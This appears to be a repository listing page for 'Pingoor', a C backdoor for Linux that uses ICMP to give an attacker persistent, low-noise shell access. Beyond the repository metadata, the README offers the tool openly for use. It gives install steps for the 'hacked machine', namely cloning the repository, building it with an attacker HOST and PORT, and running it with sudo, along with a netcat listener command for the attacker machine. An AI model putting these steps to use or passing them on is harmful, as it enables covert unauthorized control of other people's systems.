https://github.com/brosck/pingoor
「🚪」Linux Backdoor based on ICMP protocol
https://github.com/brosck/pingoor
backdoor c hacking icmp linux persistence protocol security
Last synced: 8 months ago
JSON representation
「🚪」Linux Backdoor based on ICMP protocol
- Host: GitHub
- URL: https://github.com/brosck/pingoor
- Owner: brosck
- License: gpl-3.0
- Created: 2022-12-05T17:06:22.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2024-12-07T01:52:31.000Z (12 months ago)
- Last Synced: 2025-03-24T10:11:40.604Z (8 months ago)
- Topics: backdoor, c, hacking, icmp, linux, persistence, protocol, security
- Language: C
- Homepage:
- Size: 164 KB
- Stars: 59
- Watchers: 3
- Forks: 10
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
「🚪」About Pingoor

Pingoor is a backdoor developed in C for the GNU/Linux operating system. Its main characteristic is to use the ICMP protocol to give the attacker access to the shell of a machine, making its access persistent with little noise.
## How to Use
```
# Hacked machine
$ git clone https://github.com/brosck/Pingoor.git
$ cd Pingoor
$ HOST= PORT= make
$ sudo ./pingoor
```
```
# Attacker machine
nc -lnvp
```
## Buy me a coffee?